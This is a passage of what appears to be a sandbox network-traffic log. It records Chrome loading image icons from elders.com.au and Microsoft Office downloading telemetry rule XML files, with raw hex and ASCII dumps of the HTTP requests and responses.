                                                                                                                                                                                                            2024-11-06 05:29:51 UTC810INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 1b 08 06 00 00 00 1d c7 8d 9a 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 02 c6 49 44 41 54 78 01 c5 56 4b 52 db 40 10 ed 9e 11 d9 a4 42 b4 4f e1 9a 2a f0 26 0b b0 4e 00 3e 41 e0 04 21 27 80 9c 20 e4 04 e0 13 00 27 80 1b c4 9c c0 c2 2c a1 8a 21 24 55 d9 a1 7c 36 c1 9a e9 74 5b 52 61 1b 64 e4 60 27 af ca fa 78 a6 d5 6f fa 8f 67 b5 fa 16 11 ad 01 60 02 00 27 00 f4 16 10 d6 10 20 4e 6f d3 8d e8 9b b5 1d 63 0c 24 90 44 89 95 3d 53 05 76 6b 8b 97 7c 33 25 eb 09 10 c4 42 48 5e 08 e0 fd ca e7 8b 3d 98 22 14 01 b6 c6 ac 87 85 72 01 12 4d df 02 72 39 ad 2d ee 21 e0 d6 23 7b c5 1a 6d 42
                                                                                                                                                                                                            Data Ascii: PNGIHDR pHYssRGBgAMAaIDATxVKR@BO*&N>A!' ',!$U|6t[Rad`'xog`' Noc$D=Svk|3%BH^="rMr9-!#{mB
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC7INData Raw: 45 4e 44 ae 42 60 82
                                                                                                                                                                                                            Data Ascii: ENDB`


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            103192.168.2.457780162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC624OUTGET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC701INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:52 GMT
                                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                                            Content-Length: 2373
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Last-Modified: Fri, 27 Jan 2023 07:07:35 GMT
                                                                                                                                                                                                            ETag: "0x8DB00352B0AF601"
                                                                                                                                                                                                            Content-Disposition: attachment; filename="teamwork-icon.png"; filename*=UTF-8''teamwork-icon.png
                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                            Cache-Control: public, max-age=86400, immutable
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210046-DFW
                                                                                                                                                                                                            X-Cache: MISS
                                                                                                                                                                                                            X-Timer: S1709585777.027117,VS0,VS0,VE1450
                                                                                                                                                                                                            CF-Cache-Status: REVALIDATED
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b0305f4328d5-DFW
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC668INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1f 08 06 00 00 00 f0 6c 7d 07 00 00 00 09 70 48 59 73 00 00 32 c0 00 00 32 c0 01 28 64 5a db 00 00 05 ca 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 30 2d 63 30 30 30 20 31 33 37 2e 64 61 34 61 37 65 35 2c 20 32 30 32 32 2f 31 31 2f 32 37 2d 30 39 3a 33 35 3a 30 33 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a
                                                                                                                                                                                                            Data Ascii: PNGIHDRl}pHYs22(dZiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC1369INData Raw: 54 31 37 3a 32 34 3a 35 34 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 6f 64 69 66 79 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 78 6d 70 3a 4d 65 74 61 64 61 74 61 44 61 74 65 3d 22 32 30 32 33 2d 30 31 2d 32 37 54 31 37 3a 33 36 3a 34 36 2b 31 30 3a 33 30 22 20 64 63 3a 66 6f 72 6d 61 74 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 70 68 6f 74 6f 73 68 6f 70 3a 43 6f 6c 6f 72 4d 6f 64 65 3d 22 33 22 20 78 6d 70 4d 4d 3a 49 6e 73 74 61 6e 63 65 49 44 3d 22 78 6d 70 2e 69 69 64 3a 39 36 35 64 63 62 65 30 2d 61 61 64 63 2d 61 33 34 65 2d 38 34 30 66 2d 38 34 63 32 31 32 36 61 65 63 34 39 22 20 78 6d 70 4d 4d 3a 44 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a
                                                                                                                                                                                                            Data Ascii: T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:
                                                                                                                                                                                                            2024-11-06 05:29:52 UTC336INData Raw: f1 2e e0 74 e4 c7 30 76 78 ba 05 4a 1a a5 4f e2 6c 6d c3 fb 70 12 47 42 62 6c 49 13 f1 7a 4f 1a 7f 13 0a 29 95 af 05 0e 61 b5 aa c0 a7 3a 07 3f 87 47 e0 c0 43 81 4f b1 d0 e4 57 48 23 b3 31 4e c1 07 61 8e c3 42 18 17 6a 81 f7 a5 42 6c 52 7e 72 55 da 5f b0 58 a2 e4 db 2e 70 c9 57 31 51 17 43 4a 73 56 5d e0 bf 23 a1 02 2f e3 9f 16 db bf 4a 3e ae d2 1a 70 bd 0b bc e3 05 51 d3 ee da ee ae 96 3c 91 33 2c 79 01 5b b5 ca cd f6 36 96 7a d2 1b 28 67 b4 89 32 8c e1 5f 96 dc 13 38 19 78 ac 6a b9 8b 91 b7 71 69 34 c3 d3 3e da e3 86 61 7f d0 93 7f 21 44 d5 81 20 d6 8c 46 df eb bd 5e 1b 14 a3 fb ad 71 7b 32 27 8d 3a b9 f2 7e 49 4a e7 ed 21 f9 6c 56 b0 05 a9 47 7f c3 4a e4 a3 6a 7d bb f5 80 30 3d b9 ea c0 2a 40 51 f0 09 8e b7 6d b0 a6 e5 92 e7 ab ea 4e 90 06 a3 c6 aa 2e
                                                                                                                                                                                                            Data Ascii: .t0vxJOlmpGBblIzO)a:?GCOWH#1NaBjBlR~rU_X.pW1QCJsV]#/J>pQ<3,y[6z(g2_8xjqi4>a!D F^q{2':~IJ!lVGJj}0=*@QmN.


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            104192.168.2.45777713.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                            x-ms-request-id: cd5b73c9-701e-0098-1e09-2d395f000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052951Z-16547b76f7f7scqbhC1DFW0m5w0000000630000000005we2
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            105192.168.2.45777913.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                            x-ms-request-id: 6a120a4b-401e-0078-724b-2e4d34000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052951Z-15869dbbcc6pfq2ghC1DFW0bk000000006dg00000000eeps
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            106192.168.2.45777813.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                            x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052951Z-16547b76f7fsjlq8hC1DFWehq000000005x000000000h5m7
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            107192.168.2.45778213.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                            x-ms-request-id: 75885d68-101e-005a-2958-2e882b000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052951Z-17df447cdb54qlp6hC1DFWqcfc00000002eg0000000000vc
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                            108192.168.2.45778113.107.246.45443
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                            x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                            x-azure-ref: 20241106T052951Z-16547b76f7f22sh5hC1DFWyb4w000000060000000000qafw
                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            109192.168.2.457783162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC747OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                            Referer: https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-b12902665e7f329d47d0e56b8a41e8e6-lc.min.css
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC587INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:51 GMT
                                                                                                                                                                                                            Content-Type: image/svg+xml
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                            last-modified: Tue, 29 Oct 2024 09:12:43 GMT
                                                                                                                                                                                                            etag: W/"1fe-62599fcdf98c0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-lax-kwhp1940147-LAX
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1730212281.434392,VS0,VS0,VE732
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 42546
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b032d91f6bc5-DFW
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC517INData Raw: 31 66 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 32 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 31 34 35 34 20 30 2e 32 32 32 32 31 38 43 31 31 2e 33 36 34 32 20 30 2e 32 32 32 32 31 38 20 31 31 2e 35 38 32 36 20 30 2e 33 30 32 35 36 35 20 31 31 2e 37 34 39 37 20 30 2e 34 36 33 36 37 33 43 31 32 2e 30 38 33 34 20 30 2e 37 38 35 34 37 35 20 31 32 2e 30 38 33 34 20 31 2e 33 30 37 31 32 20 31 31 2e 37 34 39 37 20 31 2e 36 32 38 39 32 4c 32 2e 39 35 32 30 37 20 31 30 2e 31 31 31 32 4c 31 31 2e 37 34 39 37 20 31 38 2e
                                                                                                                                                                                                            Data Ascii: 1fe<svg width="12" height="20" viewBox="0 0 12 20" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M11.1454 0.222218C11.3642 0.222218 11.5826 0.302565 11.7497 0.463673C12.0834 0.785475 12.0834 1.30712 11.7497 1.62892L2.95207 10.1112L11.7497 18.
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            110192.168.2.457784172.66.0.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:51 UTC424OUTGET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-external-link.svg HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
